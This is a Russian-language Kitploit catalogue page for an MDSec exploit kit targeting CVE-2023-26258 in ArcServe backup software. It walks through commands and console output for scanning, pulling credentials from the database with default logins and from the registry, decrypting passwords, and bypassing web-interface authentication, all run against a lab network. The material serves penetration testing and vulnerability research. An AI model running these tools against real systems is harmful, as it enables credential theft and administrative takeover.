Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-26258-ArcServe — Эксплойт-комплект для CVE-2023-26258, нацеленный на резервное копирование ПО ArcServe. Включает сетевой сканер, извлекатель учетных данных из базы данных и реестра, дешифратор паролей и эксплойт для обхода аутентификации в веб-интерфейсе управления. | Kitploit
Инструменты/GitHubGitHub/mdsecactivebreach/cve-2023-26258-arcserve
РазведкаАтаки на ПаролиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информации
GitHubmdsecactivebreach/cve-2023-26258-arcserve

CVE-2023-26258-ArcServe

Эксплойт-комплект для CVE-2023-26258, нацеленный на резервное копирование ПО ArcServe. Включает сетевой сканер, извлекатель учетных данных из базы данных и реестра, дешифратор паролей и эксплойт для обхода аутентификации в веб-интерфейсе управления.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
231132 лет назадПроверено Kitploit

Кратко:

Если вы находитесь в сети, вы можете просканировать экземпляры, настроенные по умолчанию, с помощью ArcServeRadar.py. Я пытался портировать его на C#, но не смог; не стесняйтесь сделать это, если знаете как :)

root@kitploit:~
c:\Users\vagrant\Desktop>python ArcServeRadar.py "Ethernet 2" 6969 192.168.56.20
                -=[ ArcServe Finder - @TheXC3LL  - MDSec ]=-


[*] Starting to monitor
[*] Broadcasting
WARNING: Mac address to reach destination not found. Using broadcast.
        [+] 192.168.56.10 => ServerName;KINGSLANDING;InstanceName;ARCSERVE_APP;IsClustered;No;Version;15.0.2000.5;tcp;62197;;

Если он настроен по умолчанию, вы можете использовать учётные данные БД по умолчанию для подключения к полученному ранее IP и порту и прочитать имя пользователя/пароль, а также расположение экземпляров ArcServe с помощью ArcServe-dbpwner.py:

root@kitploit:~

psyconauta@insulanova:/tmp|⇒  python3 arcserve-dbpwner.py -target 192.168.56.10 -port 62197
		-=[ ArcServe credential retriever (from DB) - Juan Manuel Fernandez (@TheXC3LL)  - MDSec]=-


[*] Connecting to the server
[*] Login with default creds
[*] Extracting credentials:
	[+] User: SEVENKINGDOMS\vagrant
	[+] Password: {133, 60, 97, 192, 158, 159, 25, 141, 58, 250, 174, 169, 141, 216, 104, 98}; // Paste it to the decrypter
	[+] User: SEVENKINGDOMS\vagrant
	[+] Password: {133, 60, 97, 192, 158, 159, 25, 141, 58, 250, 174, 169, 141, 216, 104, 98}; // Paste it to the decrypter
[*] Finding hosts:
	[+] 192.168.56.10 | kingslanding.sevenkingdoms.local | Windows Server 2019 Datacenter Evaluation
	[+] 192.168.56.10 | kingslanding.sevenkingdoms.local | NULL


 Have a nice day! ^_^

Все пароли, полученные инструментами, можно расшифровать с помощью ArcServeDecrypter.exe. Просто отредактируйте код на C, чтобы добавить массив, скомпилируйте и выполните его:

root@kitploit:~
C:\Users\vagrant>C:\Users\vagrant\source\repos\ArcServeDecrypter\x64\Debug\ArcServeDecrypter.exe
                -={ ArcServe Decryptor by Juan Manuel Fernandez (@TheXC3LL) - MDSec}=-

[+] Decrypted string: vagrant

Если у вас есть пользователь с правами локального администратора на сервере, где установлен ArcServe, вы можете прочитать учётные данные с помощью службы Remote Registry (arcserve-regkeys.py):

root@kitploit:~
psyconauta@insulanova:/tmp|⇒  python3 arcserve-regkeys.py -u eddard.stark -p 'FightP3aceAndHonor!' -d sevenkingdoms.local -target-ip 192.168.56.20
		-=[ ArcServe Credential Stealer - (@TheXC3LL) - MDSec]=-
[+] Connecting to 192.168.56.20
[+] Checking Remote Registry service status...
[+] Service is down!
[+] Starting Remote Registry service...
[+] Connecting to 192.168.56.20
[+] Opening registry key
	[*] User: P3TWLADS11STD\vagrant
	[*] Password: {133, 60, 97, 192, 158, 159, 25, 141, 58, 250, 174, 169, 141, 216, 104, 98}; // Paste it to the decrypter
[+] Stopping Remote Registry Service

Have a nice day! ^_^

Наконец, если версия ArcServe не была пропатчена (CVE-2023-26258), вы можете воспользоваться обходом аутентификации в веб-интерфейсе управления и получить учётные данные администратора (ArcServe-exploit.py):

root@kitploit:~
psyconauta@insulanova:/tmp|⇒  python3 ArcServe-exploit.py 192.168.56.10
		-=[ ArcServe Pwner by Juan Manuel Fernandez (@TheXC3LL) - MDSec]=-


[*] Triggering info leak
	[+] AdminName: SEVENKINGDOMS\vagrant
	[+] AuthUUID: 6bf37b8e-ac4f-487d-8d74-d6d0a8d9b8d1
[*] Getting a valid session
	[+] Session: AGENTJSESSIONID=CA35EF18A4FF2F85E25538F60C3F7428
[*] Doing an authenticated request to validate if session is valid
[*] Session is valid
	[+] Admin: SEVENKINGDOMS\vagrant
	[+] Password: {133, 60, 97, 192, 158, 159, 25, 141, 58, 250, 174, 169, 141, 216, 104, 98} // Paste it to the decrypter


Have a happy hacking! ^_^

На этом заканчивается краткий обзор инструментов, которые вы можете здесь найти.

Скачать инструмент